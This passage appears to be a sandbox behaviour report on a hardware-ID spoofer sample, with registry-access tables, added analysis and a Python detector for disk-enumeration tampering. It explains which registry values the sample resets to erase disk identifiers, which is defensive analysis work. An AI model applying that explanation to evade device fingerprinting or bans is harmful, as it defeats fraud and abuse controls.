Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\powercfg.exe N/A

Note: setupapi.dev.log is the SetupAPI device-installation log. A process that opens it for modification is driving device installation or removal through SetupAPI, which is consistent with the disk-enumeration rewrites recorded above rather than with an ordinary file drop.

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\Windows\system32\cmd.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceType C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Control C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\Conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGUID C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\Windows\system32\conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service C:\Windows\system32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80497100-8c73-48b9-aad9-ce387e19c56e}\0006 C:\Windows\System32\cmd.exe N/A
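Most rows in the two registry tables above are reads, and reads of Services\disk\Enum and Enum\SCSI are routine for device-management tools (DevManView.exe, Volumeid64.exe and AMIDEWINx64.exe in the process column are the NirSoft device viewer, the Sysinternals VolumeID tool and AMI's DMI editor, legitimate utilities that HWID spoofers commonly bundle). The rows that matter are the writes attributed to cmd.exe: Count and NextInstance under Services\disk\Enum set to 0, Enum\0 deleted, and a key created and a property deleted under the DADY HARDDISK SCSI instance. Those wipe the cached disk device-instance IDs, which carry the disk serial that fingerprinting code commonly reads; that is the spoofing itself. The Python below is an added example, not anything from the report: it parses rows in this report's layout (a constructed subset of the rows above is embedded inline) and reports only writes into those subtrees by a process outside a small allowlist. The allowlist is an illustrative assumption.

```python
"""Flag hardware-identity tampering in sandbox registry events.

Added example, not part of the original report. SAMPLE_ROWS is a
constructed subset of the report's own 'Maps connected drives' and
'Checks SCSI registry key(s)' rows. The allowlist of processes permitted
to write under the PnP enumeration keys is an assumption for illustration.
"""
import re

ROW = re.compile(
    r"^(?P<op>Key opened|Key created|Key queried|Key enumerated|Key value queried"
    r"|Set value \(\w+\)|Delete value)\s+"
    r"(?P<obj>\S.*?)"                       # registry path, may contain spaces
    r'(?:\s+=\s+"(?P<val>[^"]*)")?'         # optional value for Set value rows
    r"\s+(?P<proc>[A-Za-z]:\\\S+)\s+(?P<target>\S+)$"
)

WRITE_OPS = ("Set value", "Delete value", "Key created")

# Subtrees that hold the disk identity a HWID spoofer rewrites.
WATCHED = (
    (r"\\services\\disk\\enum(\\|$)", "disk enumeration cache"),
    (r"\\enum\\scsi\\", "SCSI device enumeration"),
)

# Assumption: only the PnP manager (System) and its service host should
# write these keys; any other writer is treated as tampering.
ALLOWED_WRITERS = {"system", r"c:\windows\system32\svchost.exe"}

SAMPLE_ROWS = r"""
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" C:\Windows\System32\cmd.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\conhost.exe N/A
"""


def parse_row(line):
    """Split one report row into op / obj / val / proc / target."""
    m = ROW.match(line.strip())
    if m is None:
        raise ValueError(f"unrecognised row: {line!r}")
    d = m.groupdict()
    d["proc"] = d["proc"].lower()
    return d


def watched_area(obj):
    """Name of the watched subtree the object lies in, or None."""
    low = obj.lower()
    for pattern, name in WATCHED:
        if re.search(pattern, low):
            return name
    return None


def evaluate(rows):
    """Return findings (severity, reason, process, object) for writes into a
    watched subtree by a non-allowlisted process. Reads are ignored: device
    managers perform them constantly. Zeroing the disk Count is rated higher
    because it erases every cached disk instance in one write."""
    findings = []
    for line in rows.strip().splitlines():
        ev = parse_row(line)
        area = watched_area(ev["obj"])
        if area is None or not ev["op"].startswith(WRITE_OPS):
            continue
        if ev["proc"] in ALLOWED_WRITERS:
            continue
        reason, severity = f"{ev['op']} on {area}", "high"
        if ev["obj"].lower().endswith(r"\services\disk\enum\count") and ev["val"] == "0":
            reason, severity = "disk enumeration Count reset to 0 (all cached disks erased)", "critical"
        findings.append({"severity": severity, "reason": reason,
                         "process": ev["proc"], "object": ev["obj"]})
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_ROWS):
        print(f"[{f['severity']}] {f['process']}: {f['reason']}\n    {f['object']}")
```

The same three rules transfer to endpoint telemetry: Sysmon registry events (event IDs 12, 13 and 14) carry the same operation, object and process fields, so the only change is the row parser. Keep the process attribution as the sandbox reports it; a command interpreter or powercfg.exe writing PnP enumeration keys is itself the anomaly, whatever ends up hosting the code.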

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
